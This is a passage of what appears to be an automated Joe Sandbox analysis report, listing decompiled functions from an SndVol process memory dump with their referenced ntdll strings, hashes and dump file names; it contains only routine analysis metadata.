                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                                                                                                                  • API String ID: 2994545307-964947082
                                                                                                                                                  • Opcode ID: 0950412c6594ea35a9bd56f3e3c8d0a1284cbe4c51cd0e78f082fd218c5d933c
                                                                                                                                                  • Instruction ID: 1caa8cfe38f1e35b264c077493c52bdb4ff7bc314bb508dccce5ad19ea6c2ddd
                                                                                                                                                  • Opcode Fuzzy Hash: 0950412c6594ea35a9bd56f3e3c8d0a1284cbe4c51cd0e78f082fd218c5d933c
                                                                                                                                                  • Instruction Fuzzy Hash: EF41E2B1A0125DBFD702EFB5C890F6B3BAAEB443C4F50406AEA11AB240DE34C855CB56
                                                                                                                                                  Function 365C33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: %s() passed the empty activation context data, xrefs: 366029FE
                                                                                                                                                  • Actx , xrefs: 365C33AC
                                                                                                                                                  • RtlCreateActivationContext, xrefs: 366029F9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                  • API String ID: 0-859632880
                                                                                                                                                  • Opcode ID: ef9c33abe7ce984e95eeb6c81cf721dc0e42acb5224c48ecd0bbbce5f5ee71d9
                                                                                                                                                  • Instruction ID: c5966d0b2e3103cff820baa458d302e420d4753ed15038e4bee7bd60444e04d1
                                                                                                                                                  • Opcode Fuzzy Hash: ef9c33abe7ce984e95eeb6c81cf721dc0e42acb5224c48ecd0bbbce5f5ee71d9
                                                                                                                                                  • Instruction Fuzzy Hash: 9C312072A00319AFEB16CFAAD8C4F8A37A8AF447A4F504479E8059F281DB35DC45CBD0
                                                                                                                                                  Function 3661B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3661B632
                                                                                                                                                  • @, xrefs: 3661B670
                                                                                                                                                  • GlobalFlag, xrefs: 3661B68F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                  • API String ID: 0-4192008846
                                                                                                                                                  • Opcode ID: ea3dad3ce4733e6b14083a91c0198dff8ab081dd98a7d3b2643801df27b59fe4
                                                                                                                                                  • Instruction ID: fa680875e7143f2498e27f1b341f314ba9c3d141a282a849b96882d1b8ea6019
                                                                                                                                                  • Opcode Fuzzy Hash: ea3dad3ce4733e6b14083a91c0198dff8ab081dd98a7d3b2643801df27b59fe4
                                                                                                                                                  • Instruction Fuzzy Hash: DB3139B5E0021DAEDB00DFA6DC80AEEBBB8EF44784F500469E605A6190D7749A04CBA5
                                                                                                                                                  Function 366313B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                                                                                                                  • API String ID: 0-1050206962
                                                                                                                                                  • Opcode ID: 039ca4af80e1eb1365c86ab0d61fbe94aa17fbda2c0015facdc944a1711b602b
                                                                                                                                                  • Instruction ID: 5b212dfe1eb233f7889057f33e09c30b2236a7bd4d36218c079aa3acce1e5128
                                                                                                                                                  • Opcode Fuzzy Hash: 039ca4af80e1eb1365c86ab0d61fbe94aa17fbda2c0015facdc944a1711b602b
                                                                                                                                                  • Instruction Fuzzy Hash: 4F317C72D01219BFEB02CF95CC80EAEFBBDEB44798F814075EA00A7261D7349D048BA1
                                                                                                                                                  Function 365C1607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpInitializeTls, xrefs: 36601A47
                                                                                                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 36601A40
                                                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 36601A51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                  • API String ID: 0-931879808
                                                                                                                                                  • Opcode ID: 949918790e6f9fa69880ec8a5aff5d2eb7e64ad748cfb1af9922ea38cc99f270
                                                                                                                                                  • Instruction ID: 2d68d4dfd3c418c7687fffb1a7e0f3ca28688b41f33d83bdfcb9ae5d72fe751b
                                                                                                                                                  • Opcode Fuzzy Hash: 949918790e6f9fa69880ec8a5aff5d2eb7e64ad748cfb1af9922ea38cc99f270
                                                                                                                                                  • Instruction Fuzzy Hash: 4E31E471A10614BBF7608FA5CC55F6A7ABAEB803D8F540579E600B7580DB70ED818F91
                                                                                                                                                  Function 365A52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$@
                                                                                                                                                  • API String ID: 0-149943524
                                                                                                                                                  • Opcode ID: f1ed0804c0b5d843fa839d4e75bb867a724f034b4ec0b7e49c5af6923dfd00c3
                                                                                                                                                  • Instruction ID: b88a56689772e120007964f906689e9f9466c2cd784dd4e4f738a3f3fe2d9179
                                                                                                                                                  • Opcode Fuzzy Hash: f1ed0804c0b5d843fa839d4e75bb867a724f034b4ec0b7e49c5af6923dfd00c3
                                                                                                                                                  • Instruction Fuzzy Hash: 8D328CB8918352CBE7158F15C880B2EB7F1EF84784FA0493EF9959B290E735C854CB92
                                                                                                                                                  Function 365AF720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$$
                                                                                                                                                  • API String ID: 0-233714265
                                                                                                                                                  • Opcode ID: 7398521f834155b554a2e86f3ff32184772ccc9f61c8f9366dbe83ba0d6894f2
                                                                                                                                                  • Instruction ID: 3ab391ee8efe7b3f54f1add0752950426452284fbb0c31f9ad8e422fef4dacab
                                                                                                                                                  • Opcode Fuzzy Hash: 7398521f834155b554a2e86f3ff32184772ccc9f61c8f9366dbe83ba0d6894f2
                                                                                                                                                  • Instruction Fuzzy Hash: 9C61BB75E0074ADFEB22CFA5C990B9DBBB2BF84748F504479D604AB280CB34A941CF91
                                                                                                                                                  Function 366235BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                  • API String ID: 0-118005554
                                                                                                                                                  • Opcode ID: 382b553e2cbe8661a113942a00d37d6f7ee0808f8f5cd313ac00fa414a7cb5ac
                                                                                                                                                  • Instruction ID: bc7cfe0c0d0c8f72960f4c68cd46b5fc4f71542af8549353434ab7148a5148d8
                                                                                                                                                  • Opcode Fuzzy Hash: 382b553e2cbe8661a113942a00d37d6f7ee0808f8f5cd313ac00fa414a7cb5ac
                                                                                                                                                  • Instruction Fuzzy Hash: 7631B8756083419FE302CF6AD884B1AB7E8EFC5794F400869B890DB390EB70D805CB97
                                                                                                                                                  Function 365C329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .Local\$@
                                                                                                                                                  • API String ID: 0-380025441
                                                                                                                                                  • Opcode ID: e7988a7a8b586f37f394ed621805929fad41ac2115551258f27e139c278370e4
                                                                                                                                                  • Instruction ID: 4d5cb0d97b8de467f5cd6aaf7821f458d34ec54ba92b528864d88351aead41c0
                                                                                                                                                  • Opcode Fuzzy Hash: e7988a7a8b586f37f394ed621805929fad41ac2115551258f27e139c278370e4
                                                                                                                                                  • Instruction Fuzzy Hash: DD3161B5508309AFE311CF69C880A5BBBE8EBD5A94F40093EF99487250DA35DD04CB93
                                                                                                                                                  Function 365C34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 36602A95
                                                                                                                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 36602A90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                  • API String ID: 0-2653619699
                                                                                                                                                  • Opcode ID: d67b3553fd322e185f23df209a04931385c7f6ee10f975ad1a9f6e9b7c20098c
                                                                                                                                                  • Instruction ID: f9741af0506ba14a9f0eb4a7fae494f822ca971c14d93f4ffd68fec1ce60ed11
                                                                                                                                                  • Opcode Fuzzy Hash: d67b3553fd322e185f23df209a04931385c7f6ee10f975ad1a9f6e9b7c20098c
                                                                                                                                                  • Instruction Fuzzy Hash: 7E1136B6B04214ABF7298E89CD85F5A76AD9F94B84F2480797904EB240DA75CD00CAA5
                                                                                                                                                  Function 365BB2C0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @[h6@[h6
                                                                                                                                                  • API String ID: 0-1053330818
                                                                                                                                                  • Opcode ID: e6062525bbc19ab141ddcbed662aec3528c2dffbb767b4b3d4dc6d1807635a16
                                                                                                                                                  • Instruction ID: efe91caa23f161a799acf34dcd031d749978accb903f5b0783a6d6036281595f
                                                                                                                                                  • Opcode Fuzzy Hash: e6062525bbc19ab141ddcbed662aec3528c2dffbb767b4b3d4dc6d1807635a16
                                                                                                                                                  • Instruction Fuzzy Hash: 0432AFB5E00219DBDF14CFA9C890BAEBBB2FF84754F540039E845AB390EB759911CB91
                                                                                                                                                  Function 366631E1 Relevance: 1.8, APIs: 1, Instructions: 281COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 36663356
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallFilterFunc@8
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4062629308-0
                                                                                                                                                  • Opcode ID: 2e555472e96c5dea81492e8e12d200f06369469086feb2d829b4952904e6a136
                                                                                                                                                  • Instruction ID: 9ddcacd9debe2500077b809183e694583bd03ac071f438b5559458bcbfd0f7be
                                                                                                                                                  • Opcode Fuzzy Hash: 2e555472e96c5dea81492e8e12d200f06369469086feb2d829b4952904e6a136
                                                                                                                                                  • Instruction Fuzzy Hash: F0C155B99017298FDB20CF1AD884699FBF5FF88358F5091AED54DA7250D734AA81CF80
                                                                                                                                                  Function 36597370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bab1097232786cf001c2639108a79d6f9edefaaf3d7e2462ee9be54ad12e2e6f
                                                                                                                                                  • Instruction ID: 9c5c5e450e5457028c0cf1935841c34de390c41d23ac87029421d979354a26f6
                                                                                                                                                  • Opcode Fuzzy Hash: bab1097232786cf001c2639108a79d6f9edefaaf3d7e2462ee9be54ad12e2e6f
                                                                                                                                                  • Instruction Fuzzy Hash: ADA16A75A18341DFE310CF28C584A5ABBE6BF88744F20497EE5899B351EB30E945CF92
                                                                                                                                                  Function 365CF603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 97e763dde1da5b61f470644eead51f7ca68e404eda8fd9b7fce79dcef370dda2
                                                                                                                                                  • Instruction ID: e81034f957106b57ea854af917f9d4446849c4c2b8c49626ac10a8ac1b8e3803
                                                                                                                                                  • Opcode Fuzzy Hash: 97e763dde1da5b61f470644eead51f7ca68e404eda8fd9b7fce79dcef370dda2
                                                                                                                                                  • Instruction Fuzzy Hash: A3411AB4D00688AFDB10CFA9C880AADFBF5BF89380F50416ED559E7215D7319955CF60
                                                                                                                                                  Function 3663DEB0 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • System Volume Information, xrefs: 3663DEBE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: System Volume Information
                                                                                                                                                  • API String ID: 2994545307-764423717
                                                                                                                                                  • Opcode ID: 0e00798f3b80a30a4d5640523398a593f66cc7bf5e3ebe71a4f977c0bc4bb7ac
                                                                                                                                                  • Instruction ID: df62ae9814d9f66357e6dbed2e09662e13d2cdc60ff77b82a4adc3842d991455
                                                                                                                                                  • Opcode Fuzzy Hash: 0e00798f3b80a30a4d5640523398a593f66cc7bf5e3ebe71a4f977c0bc4bb7ac
                                                                                                                                                  • Instruction Fuzzy Hash: 856179B1508315AFD311DF54CC80E6BB7E9EF98B94F50092EF980972A0D674DD54CBA2
                                                                                                                                                  Function 3659973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                                                  • Instruction ID: a8b5dc71db1cf3c0ea4871543f7c01a2735fa8d212d87dc8925a7512e508041c
                                                                                                                                                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                                                  • Instruction Fuzzy Hash: 376149B5D00219EBEB158F9AC840BDEBBF8EF84754F544539E810AB290DB758A01CB91
                                                                                                                                                  Function 3665132D Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: XHd
                                                                                                                                                  • API String ID: 0-999235122
                                                                                                                                                  • Opcode ID: 17c105eded6220e23532fcb9319d7708f629bdce2d2de2d45214a286c3172c82
                                                                                                                                                  • Instruction ID: 2a7db643a9d7c02afcfb6b443ff5c0062c467851e3008c4bd3f1c1fae1cf1ae5
                                                                                                                                                  • Opcode Fuzzy Hash: 17c105eded6220e23532fcb9319d7708f629bdce2d2de2d45214a286c3172c82
                                                                                                                                                  • Instruction Fuzzy Hash: E2816B75A00209DFDB09CFA8C491AAEBBF1FF88344F1581A9D859EB341D734EA51CB91
                                                                                                                                                  Function 3661F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                  • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                                                  • Instruction ID: a9bdfe6f01a08e49b943f660af36d158b38b407dc523a9de8456398748d38a7d
                                                                                                                                                  • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                                                  • Instruction Fuzzy Hash: 29518BB2914345BFE7119F65CC50F5AB7ECFB84794F800929BA8097291D7B0ED14CB92
                                                                                                                                                  Function 365C3EEB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                  • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                                                                                                                  • Instruction ID: 093ff68ccf22734a801b32b04f5c62b2854d30c960c8009eb9ba050658d2446f
                                                                                                                                                  • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                                                                                                                  • Instruction Fuzzy Hash: 5F515C715047109FD321CF59C840A5BB7F8FF88754F40892EF9959B690E7B4E904CB96
                                                                                                                                                  Function 3664B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
